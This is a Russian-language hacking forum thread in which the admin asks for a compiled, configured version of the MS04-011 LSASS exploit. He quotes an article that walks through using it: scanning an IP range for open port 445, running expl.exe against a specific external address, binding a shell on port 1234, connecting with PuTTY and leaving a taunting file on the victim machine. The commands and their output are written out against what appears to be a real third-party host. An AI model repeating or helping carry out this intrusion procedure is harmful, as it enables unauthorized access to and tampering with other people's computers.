Форум о защите от: хакеров, взлом, раскрутка, хакер, вирусы, взлом программы, взлом паролей, взлом вконтакте, взлом icq, раскрутка сайта, взлом скачать, взлом почты, взлом ru, проги взлома, хакер, программа взлома, трояны, программирование

Хакер, взлом, программа, сайт, форум, информатика, железо, разгон, раскрутка, SEO, защита, безопасность, взломать, как взломать, взлом icq, взлом вконтакте, взлом программ, одноклассники, взлом почты, взлом аськи
Текущее время: 02-05, 14:20

Часовой пояс: UTC + 3 часа




Начать новую тему Ответить на тему  [ Сообщений: 2 ] 
Автор Сообщение
 Заголовок сообщения: Уязвимость XP хороший эксплойт
СообщениеДобавлено: 10-12, 20:11 
Не в сети
<b><font color=red>Admin</font></b>
Аватара пользователя

Зарегистрирован: 22-05, 15:38
Сообщения: 1901
Очень интересная статья про использование эксплойта автор все описал в подробности но !!!!!!! не написал как

у него сделан эксплойт !!!!!!!

Вопрос может кто нить и настроить исходник так что бы он открывал порт 1234 когда когда отакуешь через

445 порт а то я где то скачал но не на сайте securitylab.ru файл ms04011lsass.rar он только открывает 445 когда

порт уже открыт вообщем пишет так !!!!!!!
пишу expl.exe to xxx.xxx.xxx.xxx и порт 1234 в строке выдаеться типа
дело в том что я не умею компилировать файлы ((((((

[*]Connecting to 213.247.202.182 445…ok! а у автора статьи выдает порт 1234 вот в чем гвоздь

[*]Attacking…ok!

Прочитайте статью и помогите чем можно напешите на почту hack99999@rambler.ru или на форуме плиз если

есть настроенный эксплойт дайте ссылку плиз !!!!! за ранее спасибо yhamobi
ссылка на эксплойт есть в статье там исходник !!!!!!!!!

А вот и сама статья
Автор:gemagla.b1n

Цель эксплоита: Remote DoS, Remote System
Воздействие эксплоита: Windows 2000 sp4, Windows XP sp1
Автор эксплоита: houseofdabus
Описание уязвимости: http://www.securitylab.ru/44490.html
Скачать эксплоит:
http://www.securitylab.ru/_Exploits/200 ... 1lsass.rar
В этой статье я буду на реальном примере возводить эксплоит и опишу основные моменты использования

уязвимости.

Lets begin.

Для начала нам нужно слить эксплоит.сливаем….в моем случае я закачивал сорсы(исходники) и

откомпилировал.

Также понадобится любой сканер,я буду использовать ][Spider 6.5.Для меня он является самм лучшим и

надежным.

Также обяателен любой telnet-клиент,я воспользовался SecureCRT.

Target.

Вот тут нам понадобится сканер Х-spider.С помощью его надо найти цель.Как известно,на машине должен быть

открыт 445 порт.Этим и надо воспользоваться.Я пользовался Х-spiderом.Он легкий,не требователен к

ресурсам,имеет удобный интерфейс,да еще и бесплатно….=)

Надо найти цеь..В меню Х-spiderа выбираем Поиск и указываем диапазон IP-адрессом и ставим условие на

открытый 445 порт.

Вот что показад мне сканер:
- 213.247.202.177
- 213.247.202.178
- 213.247.202.179
- 213.247.202.180
- 213.247.202.181
+ 213.247.202.182
- 213.247.202.183

Видите +?Значит это машина с открытым 445 портом!Цель найдена.Это был только первый шаг.

Lets attack!

После того,как цель найдена,приступаем к возведению сплоита.Вот как это надо 10делать…

Для начала определим удаленную ОС.Делаем это так…

Запускаем коммандную строку и задаем путь к сплоиту..

C:expl.exe
Смотрим на поле Targets.0-ОС ХР. Если мы зададим параметр –t,то можно определить удаленную ОС

C:expl.exe 0 213.247.202.182 1234-t

Результат:

Target:IP: 213.247.202.182: OS:WinXP Professional [universal] lsass.exe

[*] connecting to 213.247.202.182 …OK

[*] Detecting remote OS:Windows 5.1

Смотрим вверх….5.1….

Detect remote OS:

Windows 5.1-WinXp

Ось мы определили …..ХР!

Далее прсто пишем

C:expl.exe 0 213.247.202.182 1234 (без префикса –t)

[*]Connecting to 213.247.202.182 1234…ok!

[*]Attacking…ok!

Вот мы и соверили атаку на машину..

Теперь биндим там порт(я выбрал 1234,как вы видите)

Опять пишем:

C:expl.exe 0 213.247.202.182 1234

Повторяется все тоже самое,но теперь я забиндил 1234 порт на компе цели.

Теперь коннектимся…

Я запускаю PuTTy и на вкладке Session указыва АйПи машины,порт(1234) и коннектюсь по протоколу Raw.

Конектимся…и мы уже в машине …Задача выполнена…но!Не зря же мы старались..Надо немнофка пофалить!

Я оставлюя командой echo привет на компе!

C:>echo прива!Ламер ушастый!gemagla.b1n and Bcteam have you >hello.txt(оставляю послание в файле hello.txt)

Вот и все!Я вскрыл машины,оставил сообщение =)

Что я могу сказать по этому поводу?Во-первых эксплоит ,приминенный мною,основан на RPC dcom.Бага еще

до сих пор актуальна…

http://www.microsoft.com/technet/securi ... 4-011.mspx -патч.

В этот раз мне повезло…атака прошла успешно!Но мог бы быть и такой вариант:

Причин этому может быть несколько:
- помешал запущенный Firewall;
- объект атаки оказался пропатчен;
- не подошла версия операционной системы;
- компьютер жертвы вышел из сети






gemagla


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 13-02, 05:21 
Не в сети
New AH-user

Зарегистрирован: 08-01, 21:01
Сообщения: 4
sp1 уже ни у кого нету =( а темка тру была )

_________________
HaW TeaM [Hack all World] http://haw-team.org


Вернуться к началу
 Профиль  
 
Показать сообщения за:  Поле сортировки  
Начать новую тему Ответить на тему  [ Сообщений: 2 ] 

Часовой пояс: UTC + 3 часа


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 2


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения

Найти:
Перейти:  
cron
Powered by Forumenko © 2006–2014
Русская поддержка phpBB